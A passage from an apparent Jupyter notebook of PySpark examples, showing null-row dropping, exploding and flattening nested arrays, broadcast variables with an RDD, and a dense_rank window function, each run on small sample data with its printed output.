 |-- id: integer (nullable = true)
 |-- zipcode: integer (nullable = true)
 |-- type: string (nullable = true)
 |-- city: string (nullable = true)
 |-- state: string (nullable = true)
 |-- population: integer (nullable = true)

+---+-------+--------+-------------------+-----+----------+
|id |zipcode|type    |city               |state|population|
+---+-------+--------+-------------------+-----+----------+
|1  |704    |STANDARD|null               |PR   |30100     |
|2  |704    |null    |PASEO COSTA DEL SUR|PR   |null      |
|3  |709    |null    |BDA SAN LUIS       |PR   |3700      |
|4  |76166  |UNIQUE  |CINGULAR WIRELESS  |TX   |84000     |
|5  |76177  |STANDARD|null               |TX   |null      |
+---+-------+--------+-------------------+-----+----------+

In [138]:
df.na.drop().show(truncate=False)
+---+-------+------+-----------------+-----+----------+
|id |zipcode|type  |city             |state|population|
+---+-------+------+-----------------+-----+----------+
|4  |76166  |UNIQUE|CINGULAR WIRELESS|TX   |84000     |
+---+-------+------+-----------------+-----+----------+

In [139]:
df.na.drop(how="any").show(truncate=False)
+---+-------+------+-----------------+-----+----------+
|id |zipcode|type  |city             |state|population|
+---+-------+------+-----------------+-----+----------+
|4  |76166  |UNIQUE|CINGULAR WIRELESS|TX   |84000     |
+---+-------+------+-----------------+-----+----------+

In [140]:
df.na.drop(subset=["population","type"]) \
   .show(truncate=False)
+---+-------+--------+-----------------+-----+----------+
|id |zipcode|type    |city             |state|population|
+---+-------+--------+-----------------+-----+----------+
|1  |704    |STANDARD|null             |PR   |30100     |
|4  |76166  |UNIQUE  |CINGULAR WIRELESS|TX   |84000     |
+---+-------+--------+-----------------+-----+----------+

In [141]:
df.dropna().show(truncate=False)
+---+-------+------+-----------------+-----+----------+
|id |zipcode|type  |city             |state|population|
+---+-------+------+-----------------+-----+----------+
|4  |76166  |UNIQUE|CINGULAR WIRELESS|TX   |84000     |
+---+-------+------+-----------------+-----+----------+

13. Explode nested array

In [143]:
arrayArrayData = [
  ("James",[["Java","Scala","C++"],["Spark","Java"]]),
  ("Michael",[["Spark","Java","C++"],["Spark","Java"]]),
  ("Robert",[["CSharp","VB"],["Spark","Python"]])
]

df = spark.createDataFrame(data=arrayArrayData, schema = ['name','subjects'])
df.printSchema()
df.show(truncate=False)
root
 |-- name: string (nullable = true)
 |-- subjects: array (nullable = true)
 |    |-- element: array (containsNull = true)
 |    |    |-- element: string (containsNull = true)

+-------+-----------------------------------+
|name   |subjects                           |
+-------+-----------------------------------+
|James  |[[Java, Scala, C++], [Spark, Java]]|
|Michael|[[Spark, Java, C++], [Spark, Java]]|
|Robert |[[CSharp, VB], [Spark, Python]]    |
+-------+-----------------------------------+

In [146]:
df.select(df.name,explode(df.subjects)).show(truncate=False)
+-------+------------------+
|name   |col               |
+-------+------------------+
|James  |[Java, Scala, C++]|
|James  |[Spark, Java]     |
|Michael|[Spark, Java, C++]|
|Michael|[Spark, Java]     |
|Robert |[CSharp, VB]      |
|Robert |[Spark, Python]   |
+-------+------------------+

In [150]:
df.select(df.name,flatten(df.subjects)).show(truncate=False)
+-------+-------------------------------+
|name   |flatten(subjects)              |
+-------+-------------------------------+
|James  |[Java, Scala, C++, Spark, Java]|
|Michael|[Spark, Java, C++, Spark, Java]|
|Robert |[CSharp, VB, Spark, Python]    |
+-------+-------------------------------+

14. Broadcast RDD

In [151]:
states = {"NY":"New York", "CA":"California", "FL":"Florida"}
broadcastStates = spark.sparkContext.broadcast(states)

data = [("James","Smith","USA","CA"),
    ("Michael","Rose","USA","NY"),
    ("Robert","Williams","USA","CA"),
    ("Maria","Jones","USA","FL")
  ]
In [152]:
rdd = spark.sparkContext.parallelize(data)

def state_convert(code):
    return broadcastStates.value[code]

result = rdd.map(lambda x: (x[0],x[1],x[2],state_convert(x[3]))).collect()
In [154]:
print(result)
[('James', 'Smith', 'USA', 'California'), ('Michael', 'Rose', 'USA', 'New York'), ('Robert', 'Williams', 'USA', 'California'), ('Maria', 'Jones', 'USA', 'Florida')]

15. Window function to apply dense rank

In [156]:
simpleData = (("James", "Sales", 3000), \
    ("Michael", "Sales", 4600),  \
    ("Robert", "Sales", 4100),   \
    ("Maria", "Finance", 3000),  \
    ("James", "Sales", 3000),    \
    ("Scott", "Finance", 3300),  \
    ("Jen", "Finance", 3900),    \
    ("Jeff", "Marketing", 3000), \
    ("Kumar", "Marketing", 2000),\
    ("Saif", "Sales", 4100) \
  )
 
columns= ["employee_name", "department", "salary"]

df = spark.createDataFrame(data = simpleData, schema = columns)

df.printSchema()
df.show(truncate=False)
root
 |-- employee_name: string (nullable = true)
 |-- department: string (nullable = true)
 |-- salary: long (nullable = true)

+-------------+----------+------+
|employee_name|department|salary|
+-------------+----------+------+
|James        |Sales     |3000  |
|Michael      |Sales     |4600  |
|Robert       |Sales     |4100  |
|Maria        |Finance   |3000  |
|James        |Sales     |3000  |
|Scott        |Finance   |3300  |
|Jen          |Finance   |3900  |
|Jeff         |Marketing |3000  |
|Kumar        |Marketing |2000  |
|Saif         |Sales     |4100  |
+-------------+----------+------+

In [158]:
windowSpec  = Window.partitionBy("department").orderBy("salary")
In [159]:
from pyspark.sql.functions import dense_rank
df.withColumn("dense_rank",dense_rank().over(windowSpec)) \
    .show()
+-------------+----------+------+----------+
|employee_name|department|salary|dense_rank|
+-------------+----------+------+----------+
|        James|     Sales|  3000|         1|
|        James|     Sales|  3000|         1|
|       Robert|     Sales|  4100|         2|
|         Saif|     Sales|  4100|         2|
|      Michael|     Sales|  4600|         3|
|        Maria|   Finance|  3000|         1|
|        Scott|   Finance|  3300|         2|
|          Jen|   Finance|  3900|         3|
|        Kumar| Marketing|  2000|         1|
|         Jeff| Marketing|  3000|         2|
+-------------+----------+------+----------+

In [ ]: